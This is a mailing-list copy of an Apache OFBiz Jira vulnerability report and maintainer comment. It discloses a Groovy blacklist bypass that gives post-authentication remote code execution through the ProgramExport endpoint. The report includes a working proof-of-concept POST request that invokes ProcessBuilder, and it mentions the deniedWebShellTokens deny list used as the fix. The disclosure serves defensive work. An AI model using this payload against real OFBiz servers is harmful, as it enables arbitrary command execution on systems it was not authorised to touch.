You are viewing a plain text version of this content. The canonical link for it is here.

Posted to notifications@ofbiz.apache.org by "Jacques Le Roux (Jira)" <ji...@apache.org> on 2022/02/10 13:27:00 UTC

[jira] [Comment Edited] (OFBIZ-12571) groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport

    [ https://issues.apache.org/jira/browse/OFBIZ-12571?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17490217#comment-17490217 ] 

Jacques Le Roux edited comment on OFBIZ-12571 at 2/10/22, 1:26 PM:
-------------------------------------------------------------------

Thanks Y4er for your much appreciated report, 

This has been fixed simply by adding processbuilder to deniedWebShellTokens in security.properties file

If you find some other similar issues don't hesitate to create a new Jira, TIA


was (Author: jacques.le.roux):
This has been fixed simply by adding processbuilder to deniedWebShellTokens in security.properties file

> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
> -------------------------------------------------------------------------------
>
>                 Key: OFBIZ-12571
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12571
>             Project: OFBiz
>          Issue Type: Bug
>          Components: framework/webtools
>    Affects Versions: 18.12.05
>         Environment: ofbiz 18.12.05
>            Reporter: Y4er
>            Assignee: Jacques Le Roux
>            Priority: Major
>             Fix For: 18.12.06, 22.01.01
>
>         Attachments: image-2022-02-10-17-50-58-914.png
>
>
> groovy blacklist bypass cause post-auth RCE from webtools/control/ProgramExport
>  
> {code:java}
> POST /webtools/control/ProgramExport HTTP/1.1
> Host: 192.168.1.178:8443
> Cookie: JSESSIONID=256ECC64937BFB5F47A32A14B272EE8F.jvm1; webtools.securedLoginId=admin; OFBiz.Visitor=10302
> Content-Type: application/x-www-form-urlencoded
> Connection: close
> Content-Length: 68
> groovyProgram=ProcessBuilder.newInstance%28%22calc%22%29.start%28%29 {code}
> !image-2022-02-10-17-50-58-914.png|width=751,height=407!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)